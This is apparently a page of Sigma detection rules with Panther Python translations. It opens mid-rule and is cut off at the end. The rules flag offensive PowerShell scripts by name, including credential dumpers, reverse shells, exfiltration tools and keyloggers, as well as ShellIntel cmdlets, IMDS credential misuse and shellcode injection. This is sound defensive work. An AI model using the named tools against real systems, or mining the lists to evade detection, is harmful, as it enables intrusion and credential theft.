                    "Get-SecurityPackages.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-ServiceFilePermission.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-ServicePermission.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-ServiceUnquoted.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-SiteListPassword.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-System.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-TimedScreenshot.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-UnattendedInstallFile.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-Unconstrained.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-USBKeystrokes.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-VaultCredential.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-VulnAutoRun.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-VulnSchTask.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-WebConfig.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-WebCredentials.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-WLAN-Keys.ps1" in event.deep_get("ContextInfo", default=""),
                    "Gupt-Backdoor.ps1" in event.deep_get("ContextInfo", default=""),
                    "HTTP-Backdoor.ps1" in event.deep_get("ContextInfo", default=""),
                    "HTTP-Login.ps1" in event.deep_get("ContextInfo", default=""),
                    "Install-ServiceBinary.ps1" in event.deep_get("ContextInfo", default=""),
                    "Install-SSP.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-ACLScanner.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-ADSBackdoor.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-AmsiBypass.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-ARPScan.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-BackdoorLNK.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-BadPotato.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-BetterSafetyKatz.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-BruteForce.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-BypassUAC.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Carbuncle.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Certify.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-ConPtyShell.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-CredentialInjection.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-CredentialsPhish.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-DAFT.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-DCSync.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Decode.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-DinvokeKatz.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-DllInjection.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-DNSExfiltrator.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-DowngradeAccount.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-EgressCheck.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Encode.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-EventViewer.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Eyewitness.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-FakeLogonScreen.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Farmer.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Get-RBCD-Threaded.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Gopher.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Grouper2.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Grouper3.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-HandleKatz.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Interceptor.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Internalmonologue.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Inveigh.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-InveighRelay.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-JSRatRegsvr.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-JSRatRundll.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-KrbRelay.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-KrbRelayUp.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-LdapSignCheck.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Lockless.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-MalSCCM.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Mimikatz.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-MimikatzWDigestDowngrade.ps1"
                    in event.deep_get("ContextInfo", default=""),
                    "Invoke-Mimikittenz.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-MITM6.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-NanoDump.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-NetRipper.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-NetworkRelay.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-NinjaCopy.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-OxidResolver.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-P0wnedshell.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-P0wnedshellx86.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Paranoia.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-PortScan.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-PoshRatHttp.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-PoshRatHttps.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-PostExfil.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-PowerDump.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-PowerDPAPI.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-PowerShellIcmp.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-PowerShellTCP.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-PowerShellTcpOneLine.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-PowerShellTcpOneLineBind.ps1"
                    in event.deep_get("ContextInfo", default=""),
                    "Invoke-PowerShellUdp.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-PowerShellUdpOneLine.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-PowerShellWMI.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-PowerThIEf.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-PPLDump.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Prasadhak.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-PsExec.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-PsGcat.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-PsGcatAgent.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-PSInject.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-PsUaCme.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-ReflectivePEInjection.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-ReverseDNSLookup.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Rubeus.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-RunAs.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-SafetyKatz.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-SauronEye.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-SCShell.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Seatbelt.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-ServiceAbuse.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-SessionGopher.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-ShellCode.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-SMBScanner.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Snaffler.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Spoolsample.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-SSHCommand.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-SSIDExfil.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-StandIn.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-StickyNotesExtract.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Tater.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Thunderfox.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-ThunderStruck.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-TokenManipulation.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Tokenvator.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-TotalExec.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-UrbanBishop.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-UserHunter.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-VoiceTroll.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Whisker.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-WinEnum.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-winPEAS.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-WireTap.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-WmiCommand.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-WScriptBypassUAC.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Zerologon.ps1" in event.deep_get("ContextInfo", default=""),
                    "Keylogger.ps1" in event.deep_get("ContextInfo", default=""),
                    "MailRaider.ps1" in event.deep_get("ContextInfo", default=""),
                    "New-HoneyHash.ps1" in event.deep_get("ContextInfo", default=""),
                    "OfficeMemScraper.ps1" in event.deep_get("ContextInfo", default=""),
                    "Offline_Winpwn.ps1" in event.deep_get("ContextInfo", default=""),
                    "Out-CHM.ps1" in event.deep_get("ContextInfo", default=""),
                    "Out-DnsTxt.ps1" in event.deep_get("ContextInfo", default=""),
                    "Out-Excel.ps1" in event.deep_get("ContextInfo", default=""),
                    "Out-HTA.ps1" in event.deep_get("ContextInfo", default=""),
                    "Out-Java.ps1" in event.deep_get("ContextInfo", default=""),
                    "Out-JS.ps1" in event.deep_get("ContextInfo", default=""),
                    "Out-Minidump.ps1" in event.deep_get("ContextInfo", default=""),
                    "Out-RundllCommand.ps1" in event.deep_get("ContextInfo", default=""),
                    "Out-SCF.ps1" in event.deep_get("ContextInfo", default=""),
                    "Out-SCT.ps1" in event.deep_get("ContextInfo", default=""),
                    "Out-Shortcut.ps1" in event.deep_get("ContextInfo", default=""),
                    "Out-WebQuery.ps1" in event.deep_get("ContextInfo", default=""),
                    "Out-Word.ps1" in event.deep_get("ContextInfo", default=""),
                    "Parse_Keys.ps1" in event.deep_get("ContextInfo", default=""),
                    "Port-Scan.ps1" in event.deep_get("ContextInfo", default=""),
                    "PowerBreach.ps1" in event.deep_get("ContextInfo", default=""),
                    "powercat.ps1" in event.deep_get("ContextInfo", default=""),
                    "PowerRunAsSystem.psm1" in event.deep_get("ContextInfo", default=""),
                    "PowerSharpPack.ps1" in event.deep_get("ContextInfo", default=""),
                    "PowerUp.ps1" in event.deep_get("ContextInfo", default=""),
                    "PowerUpSQL.ps1" in event.deep_get("ContextInfo", default=""),
                    "PowerView.ps1" in event.deep_get("ContextInfo", default=""),
                    "PSAsyncShell.ps1" in event.deep_get("ContextInfo", default=""),
                    "RemoteHashRetrieval.ps1" in event.deep_get("ContextInfo", default=""),
                    "Remove-Persistence.ps1" in event.deep_get("ContextInfo", default=""),
                    "Remove-PoshRat.ps1" in event.deep_get("ContextInfo", default=""),
                    "Remove-Update.ps1" in event.deep_get("ContextInfo", default=""),
                    "Run-EXEonRemote.ps1" in event.deep_get("ContextInfo", default=""),
                    "Schtasks-Backdoor.ps1" in event.deep_get("ContextInfo", default=""),
                    "Set-DCShadowPermissions.ps1" in event.deep_get("ContextInfo", default=""),
                    "Set-MacAttribute.ps1" in event.deep_get("ContextInfo", default=""),
                    "Set-RemotePSRemoting.ps1" in event.deep_get("ContextInfo", default=""),
                    "Set-RemoteWMI.ps1" in event.deep_get("ContextInfo", default=""),
                    "Set-Wallpaper.ps1" in event.deep_get("ContextInfo", default=""),
                    "Show-TargetScreen.ps1" in event.deep_get("ContextInfo", default=""),
                    "Speak.ps1" in event.deep_get("ContextInfo", default=""),
                    "Start-CaptureServer.ps1" in event.deep_get("ContextInfo", default=""),
                    "Start-WebcamRecorder.ps1" in event.deep_get("ContextInfo", default=""),
                    "StringToBase64.ps1" in event.deep_get("ContextInfo", default=""),
                    "TexttoExe.ps1" in event.deep_get("ContextInfo", default=""),
                    "Veeam-Get-Creds.ps1" in event.deep_get("ContextInfo", default=""),
                    "VolumeShadowCopyTools.ps1" in event.deep_get("ContextInfo", default=""),
                    "WinPwn.ps1" in event.deep_get("ContextInfo", default=""),
                    "WSUSpendu.ps1" in event.deep_get("ContextInfo", default=""),
                ]
            ),
            all(
                [
                    "Invoke-Sharp" in event.deep_get("ContextInfo", default=""),
                    ".ps1" in event.deep_get("ContextInfo", default=""),
                ]
            ),
        ]
    ):
        return True
    return False

view Sigma YAML

title: Malicious PowerShell Scripts - PoshModule
id: 41025fd7-0466-4650-a813-574aaacbe7f4
related:
    - id: f331aa1f-8c53-4fc3-b083-cc159bc971cb
      type: similar
    - id: bf7286e7-c0be-460b-a7e8-5b2e07ecc2f2
      type: obsolete
status: test
description: Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance
references:
    - https://github.com/PowerShellMafia/PowerSploit
    - https://github.com/NetSPI/PowerUpSQL
    - https://github.com/CsEnox/EventViewer-UACBypass
    - https://web.archive.org/web/20210511204621/https://github.com/AlsidOfficial/WSUSpendu
    - https://github.com/nettitude/Invoke-PowerThIEf
    - https://github.com/S3cur3Th1sSh1t/WinPwn
    - https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries
    - https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1
    - https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1
    - https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1
    - https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1
    - https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ # Invoke-TotalExec
    - https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/ # Invoke-TotalExec
    - https://github.com/HarmJ0y/DAMP
    - https://github.com/samratashok/nishang
    - https://github.com/DarkCoderSc/PowerRunAsSystem/
    - https://github.com/besimorhino/powercat
    - https://github.com/sadshade/veeam-creds/blob/6010eaf31ba41011b58d6af3950cffbf6f5cea32/Veeam-Get-Creds.ps1
    - https://github.com/The-Viper-One/Invoke-PowerDPAPI/
    - https://github.com/Arno0x/DNSExfiltrator/
author: frack113, Nasreddine Bencherchali (Nextron Systems)
date: 2023-01-23
modified: 2025-12-10
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    product: windows
    category: ps_module
    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b
detection:
    selection_generic:
        ContextInfo|contains:
            - 'Add-ConstrainedDelegationBackdoor.ps1'
            - 'Add-Exfiltration.ps1'
            - 'Add-Persistence.ps1'
            - 'Add-RegBackdoor.ps1'
            - 'Add-RemoteRegBackdoor.ps1'
            - 'Add-ScrnSaveBackdoor.ps1'
            - 'BadSuccessor.ps1'
            - 'Check-VM.ps1'
            - 'ConvertTo-ROT13.ps1'
            - 'Copy-VSS.ps1'
            - 'Create-MultipleSessions.ps1'
            - 'DNS_TXT_Pwnage.ps1'
            - 'dnscat2.ps1'
            - 'Do-Exfiltration.ps1'
            - 'DomainPasswordSpray.ps1'
            - 'Download_Execute.ps1'
            - 'Download-Execute-PS.ps1'
            - 'Enabled-DuplicateToken.ps1'
            - 'Enable-DuplicateToken.ps1'
            - 'Execute-Command-MSSQL.ps1'
            - 'Execute-DNSTXT-Code.ps1'
            - 'Execute-OnTime.ps1'
            - 'ExetoText.ps1'
            - 'Exploit-Jboss.ps1'
            - 'Find-AVSignature.ps1'
            - 'Find-Fruit.ps1'
            - 'Find-GPOLocation.ps1'
            - 'Find-TrustedDocuments.ps1'
            - 'FireBuster.ps1'
            - 'FireListener.ps1'
            - 'Get-ApplicationHost.ps1'
            - 'Get-ChromeDump.ps1'
            - 'Get-ClipboardContents.ps1'
            - 'Get-ComputerDetail.ps1'
            - 'Get-FoxDump.ps1'
            - 'Get-GPPAutologon.ps1'
            - 'Get-GPPPassword.ps1'
            - 'Get-IndexedItem.ps1'
            - 'Get-Keystrokes.ps1'
            - 'Get-LSASecret.ps1'
            - 'Get-MicrophoneAudio.ps1'
            - 'Get-PassHashes.ps1'
            - 'Get-PassHints.ps1'
            - 'Get-RegAlwaysInstallElevated.ps1'
            - 'Get-RegAutoLogon.ps1'
            - 'Get-RickAstley.ps1'
            - 'Get-Screenshot.ps1'
            - 'Get-SecurityPackages.ps1'
            - 'Get-ServiceFilePermission.ps1'
            - 'Get-ServicePermission.ps1'
            - 'Get-ServiceUnquoted.ps1'
            - 'Get-SiteListPassword.ps1'
            - 'Get-System.ps1'
            - 'Get-TimedScreenshot.ps1'
            - 'Get-UnattendedInstallFile.ps1'
            - 'Get-Unconstrained.ps1'
            - 'Get-USBKeystrokes.ps1'
            - 'Get-VaultCredential.ps1'
            - 'Get-VulnAutoRun.ps1'
            - 'Get-VulnSchTask.ps1'
            - 'Get-WebConfig.ps1'
            - 'Get-WebCredentials.ps1'
            - 'Get-WLAN-Keys.ps1'
            - 'Gupt-Backdoor.ps1'
            - 'HTTP-Backdoor.ps1'
            - 'HTTP-Login.ps1'
            - 'Install-ServiceBinary.ps1'
            - 'Install-SSP.ps1'
            - 'Invoke-ACLScanner.ps1'
            - 'Invoke-ADSBackdoor.ps1'
            - 'Invoke-AmsiBypass.ps1'
            - 'Invoke-ARPScan.ps1'
            - 'Invoke-BackdoorLNK.ps1'
            - 'Invoke-BadPotato.ps1'
            - 'Invoke-BetterSafetyKatz.ps1'
            - 'Invoke-BruteForce.ps1'
            - 'Invoke-BypassUAC.ps1'
            - 'Invoke-Carbuncle.ps1'
            - 'Invoke-Certify.ps1'
            - 'Invoke-ConPtyShell.ps1'
            - 'Invoke-CredentialInjection.ps1'
            - 'Invoke-CredentialsPhish.ps1'
            - 'Invoke-DAFT.ps1'
            - 'Invoke-DCSync.ps1'
            - 'Invoke-Decode.ps1'
            - 'Invoke-DinvokeKatz.ps1'
            - 'Invoke-DllInjection.ps1'
            - 'Invoke-DNSExfiltrator.ps1'
            - 'Invoke-DowngradeAccount.ps1'
            - 'Invoke-EgressCheck.ps1'
            - 'Invoke-Encode.ps1'
            - 'Invoke-EventViewer.ps1'
            - 'Invoke-Eyewitness.ps1'
            - 'Invoke-FakeLogonScreen.ps1'
            - 'Invoke-Farmer.ps1'
            - 'Invoke-Get-RBCD-Threaded.ps1'
            - 'Invoke-Gopher.ps1'
            - 'Invoke-Grouper2.ps1'
            - 'Invoke-Grouper3.ps1'
            - 'Invoke-HandleKatz.ps1'
            - 'Invoke-Interceptor.ps1'
            - 'Invoke-Internalmonologue.ps1'
            - 'Invoke-Inveigh.ps1'
            - 'Invoke-InveighRelay.ps1'
            - 'Invoke-JSRatRegsvr.ps1'
            - 'Invoke-JSRatRundll.ps1'
            - 'Invoke-KrbRelay.ps1'
            - 'Invoke-KrbRelayUp.ps1'
            - 'Invoke-LdapSignCheck.ps1'
            - 'Invoke-Lockless.ps1'
            - 'Invoke-MalSCCM.ps1'
            - 'Invoke-Mimikatz.ps1'
            - 'Invoke-MimikatzWDigestDowngrade.ps1'
            - 'Invoke-Mimikittenz.ps1'
            - 'Invoke-MITM6.ps1'
            - 'Invoke-NanoDump.ps1'
            - 'Invoke-NetRipper.ps1'
            - 'Invoke-NetworkRelay.ps1'
            - 'Invoke-NinjaCopy.ps1'
            - 'Invoke-OxidResolver.ps1'
            - 'Invoke-P0wnedshell.ps1'
            - 'Invoke-P0wnedshellx86.ps1'
            - 'Invoke-Paranoia.ps1'
            - 'Invoke-PortScan.ps1'
            - 'Invoke-PoshRatHttp.ps1'
            - 'Invoke-PoshRatHttps.ps1'
            - 'Invoke-PostExfil.ps1'
            - 'Invoke-PowerDump.ps1'
            - 'Invoke-PowerDPAPI.ps1'
            - 'Invoke-PowerShellIcmp.ps1'
            - 'Invoke-PowerShellTCP.ps1'
            - 'Invoke-PowerShellTcpOneLine.ps1'
            - 'Invoke-PowerShellTcpOneLineBind.ps1'
            - 'Invoke-PowerShellUdp.ps1'
            - 'Invoke-PowerShellUdpOneLine.ps1'
            - 'Invoke-PowerShellWMI.ps1'
            - 'Invoke-PowerThIEf.ps1'
            - 'Invoke-PPLDump.ps1'
            - 'Invoke-Prasadhak.ps1'
            - 'Invoke-PsExec.ps1'
            - 'Invoke-PsGcat.ps1'
            - 'Invoke-PsGcatAgent.ps1'
            - 'Invoke-PSInject.ps1'
            - 'Invoke-PsUaCme.ps1'
            - 'Invoke-ReflectivePEInjection.ps1'
            - 'Invoke-ReverseDNSLookup.ps1'
            - 'Invoke-Rubeus.ps1'
            - 'Invoke-RunAs.ps1'
            - 'Invoke-SafetyKatz.ps1'
            - 'Invoke-SauronEye.ps1'
            - 'Invoke-SCShell.ps1'
            - 'Invoke-Seatbelt.ps1'
            - 'Invoke-ServiceAbuse.ps1'
            - 'Invoke-SessionGopher.ps1'
            - 'Invoke-ShellCode.ps1'
            - 'Invoke-SMBScanner.ps1'
            - 'Invoke-Snaffler.ps1'
            - 'Invoke-Spoolsample.ps1'
            - 'Invoke-SSHCommand.ps1'
            - 'Invoke-SSIDExfil.ps1'
            - 'Invoke-StandIn.ps1'
            - 'Invoke-StickyNotesExtract.ps1'
            - 'Invoke-Tater.ps1'
            - 'Invoke-Thunderfox.ps1'
            - 'Invoke-ThunderStruck.ps1'
            - 'Invoke-TokenManipulation.ps1'
            - 'Invoke-Tokenvator.ps1'
            - 'Invoke-TotalExec.ps1'
            - 'Invoke-UrbanBishop.ps1'
            - 'Invoke-UserHunter.ps1'
            - 'Invoke-VoiceTroll.ps1'
            - 'Invoke-Whisker.ps1'
            - 'Invoke-WinEnum.ps1'
            - 'Invoke-winPEAS.ps1'
            - 'Invoke-WireTap.ps1'
            - 'Invoke-WmiCommand.ps1'
            - 'Invoke-WScriptBypassUAC.ps1'
            - 'Invoke-Zerologon.ps1'
            - 'Keylogger.ps1'
            - 'MailRaider.ps1'
            - 'New-HoneyHash.ps1'
            - 'OfficeMemScraper.ps1'
            - 'Offline_Winpwn.ps1'
            - 'Out-CHM.ps1'
            - 'Out-DnsTxt.ps1'
            - 'Out-Excel.ps1'
            - 'Out-HTA.ps1'
            - 'Out-Java.ps1'
            - 'Out-JS.ps1'
            - 'Out-Minidump.ps1'
            - 'Out-RundllCommand.ps1'
            - 'Out-SCF.ps1'
            - 'Out-SCT.ps1'
            - 'Out-Shortcut.ps1'
            - 'Out-WebQuery.ps1'
            - 'Out-Word.ps1'
            - 'Parse_Keys.ps1'
            - 'Port-Scan.ps1'
            - 'PowerBreach.ps1'
            - 'powercat.ps1'
            - 'PowerRunAsSystem.psm1'
            - 'PowerSharpPack.ps1'
            - 'PowerUp.ps1'
            - 'PowerUpSQL.ps1'
            - 'PowerView.ps1'
            - 'PSAsyncShell.ps1'
            - 'RemoteHashRetrieval.ps1'
            - 'Remove-Persistence.ps1'
            - 'Remove-PoshRat.ps1'
            - 'Remove-Update.ps1'
            - 'Run-EXEonRemote.ps1'
            - 'Schtasks-Backdoor.ps1'
            - 'Set-DCShadowPermissions.ps1'
            - 'Set-MacAttribute.ps1'
            - 'Set-RemotePSRemoting.ps1'
            - 'Set-RemoteWMI.ps1'
            - 'Set-Wallpaper.ps1'
            - 'Show-TargetScreen.ps1'
            - 'Speak.ps1'
            - 'Start-CaptureServer.ps1'
            - 'Start-WebcamRecorder.ps1'
            - 'StringToBase64.ps1'
            - 'TexttoExe.ps1'
            - 'Veeam-Get-Creds.ps1'
            - 'VolumeShadowCopyTools.ps1'
            - 'WinPwn.ps1'
            - 'WSUSpendu.ps1'
    selection_invoke_sharp:
        ContextInfo|contains|all:
            - 'Invoke-Sharp' # Covers all "Invoke-Sharp" variants
            - '.ps1'
    condition: 1 of selection_*
falsepositives:
    - Unknown
level: high

Convert to SIEM query

high

Malicious ShellIntel PowerShell Commandlets

Detects Commandlet names from ShellIntel exploitation scripts.

status test author Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems) id 402e1e1d-ad59-47b6-bf80-1ee44985b3a7

panther query

def rule(event):
    if any(
        [
            "Invoke-SMBAutoBrute" in event.deep_get("ScriptBlockText", default=""),
            "Invoke-GPOLinks" in event.deep_get("ScriptBlockText", default=""),
            "Invoke-Potato" in event.deep_get("ScriptBlockText", default=""),
        ]
    ):
        return True
    return False

view Sigma YAML

title: Malicious ShellIntel PowerShell Commandlets
id: 402e1e1d-ad59-47b6-bf80-1ee44985b3a7
status: test
description: Detects Commandlet names from ShellIntel exploitation scripts.
references:
    - https://github.com/Shellntel/scripts/
author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)
date: 2021-08-09
modified: 2023-01-02
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    product: windows
    category: ps_script
    definition: 'Requirements: Script Block Logging must be enabled'
detection:
    selection:
        ScriptBlockText|contains:
            - 'Invoke-SMBAutoBrute'
            - 'Invoke-GPOLinks'
            # - 'Out-Minidump' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6
            - 'Invoke-Potato'
    condition: selection
falsepositives:
    - Unknown
level: high

Convert to SIEM query

high

Malicious Usage Of IMDS Credentials Outside Of AWS Infrastructure

Detects when an instance identity has taken an action that isn't inside SSM. This can indicate that a compromised EC2 instance is being used as a pivot point.

status test author jamesc-grafana id 352a918a-34d8-4882-8470-44830c507aa3

panther query

import re


def rule(event):
    if all(
        [
            re.match(r".+:assumed-role/aws:.+", event.deep_get("userIdentity", "arn", default="")),
            not any(
                [
                    event.deep_get("eventSource", default="") == "ssm.amazonaws.com",
                    event.deep_get("eventName", default="") == "RegisterManagedInstance",
                    event.deep_get("sourceIPAddress", default="") == "AWS Internal",
                ]
            ),
        ]
    ):
        return True
    return False

view Sigma YAML

title: Malicious Usage Of IMDS Credentials Outside Of AWS Infrastructure
id: 352a918a-34d8-4882-8470-44830c507aa3
status: test
description: |
    Detects when an instance identity has taken an action that isn't inside SSM.
    This can indicate that a compromised EC2 instance is being used as a pivot point.
references:
    - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-identity-roles.html
    - https://ermetic.com/blog/aws/aws-ec2-imds-what-you-need-to-know/
    - https://www.packetmischief.ca/2023/07/31/amazon-ec2-credential-exfiltration-how-it-happens-and-how-to-mitigate-it/#lifting-credentials-from-imds-this-is-why-we-cant-have-nice-things
author: jamesc-grafana
date: 2024-07-11
tags:
    - attack.privilege-escalation
    - attack.initial-access
    - attack.persistence
    - attack.stealth
    - attack.t1078
    - attack.t1078.002
logsource:
    product: aws
    service: cloudtrail
detection:
    selection:
        userIdentity.arn|re: '.+:assumed-role/aws:.+'
    filter_main_generic:
        - eventSource: 'ssm.amazonaws.com'
        - eventName: 'RegisterManagedInstance'
        - sourceIPAddress: 'AWS Internal'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - A team has configured an EC2 instance to use instance profiles that grant the option for the EC2 instance to talk to other AWS Services
level: high

Convert to SIEM query

high

Malware Shellcode in Verclsid Target Process

Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro

status test author John Lambert (tech), Florian Roth (Nextron Systems) id b7967e22-3d7e-409b-9ed5-cdae3f9243a1

panther query

def rule(event):
    if all(
        [
            event.deep_get("TargetImage", default="").endswith("\\verclsid.exe"),
            event.deep_get("GrantedAccess", default="") == "0x1FFFFF",
            any(
                [
                    all(
                        [
                            "|UNKNOWN(" in event.deep_get("CallTrace", default=""),
                            "VBE7.DLL" in event.deep_get("CallTrace", default=""),
                        ]
                    ),
                    all(
                        [
                            "\\Microsoft Office\\" in event.deep_get("SourceImage", default=""),
                            "|UNKNOWN" in event.deep_get("CallTrace", default=""),
                        ]
                    ),
                ]
            ),
        ]
    ):
        return True
    return False

view Sigma YAML

title: Malware Shellcode in Verclsid Target Process
id: b7967e22-3d7e-409b-9ed5-cdae3f9243a1
status: test
description: Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro
references:
    - https://twitter.com/JohnLaTwC/status/837743453039534080
author: John Lambert (tech), Florian Roth (Nextron Systems)
date: 2017-03-04
modified: 2021-11-27
tags:
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1055
    - detection.emerging-threats
logsource:
